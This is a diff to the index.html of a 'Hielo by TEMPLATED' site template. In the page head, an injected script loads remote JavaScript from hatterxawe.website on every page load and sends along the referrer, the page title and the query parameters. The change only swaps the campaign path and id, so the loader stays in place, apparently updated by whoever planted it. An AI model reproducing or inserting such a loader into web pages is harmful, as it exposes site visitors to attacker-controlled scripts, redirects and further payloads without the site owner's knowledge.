--- a/index.html
+++ b/index.html
@@ -6,15 +6,15 @@
 -->
 <html>
 	<head>
-		<span id="faa34efd-8a16-a013-6a1c-72df0b57dda8"></span><script type="application/javascript">
+		<span id="7a3d276e-8f71-c771-34cc-b3ddc7ff065d"></span><script type="application/javascript">
 var d=document;var s=d.createElement('script'); 
-s.src='https://hatterxawe.website/zwc75m?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ec2b4c33afa0=script5ec2b4c33afa1&_cid=faa34efd-8a16-a013-6a1c-72df0b57dda8'; 
+s.src='https://hatterxawe.website/w4ZK7Wdw?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ec386690eaae=script5ec386690eaaf&_cid=7a3d276e-8f71-c771-34cc-b3ddc7ff065d'; 
 if (document.currentScript) { 
 document.currentScript.parentNode.insertBefore(s, document.currentScript);
 } else {
 d.getElementsByTagName('head')[0].appendChild(s);
 }
-if (document.location.protocol === 'https:' && 'https://hatterxawe.website/zwc75m?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ec2b4c33afa0=script5ec2b4c33afa1'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
+if (document.location.protocol === 'https:' && 'https://hatterxawe.website/w4ZK7Wdw?se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm5ec386690eaae=script5ec386690eaaf'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
 </script>
 		<title>Hielo by TEMPLATED</title>
 		<meta charset="utf-8" />
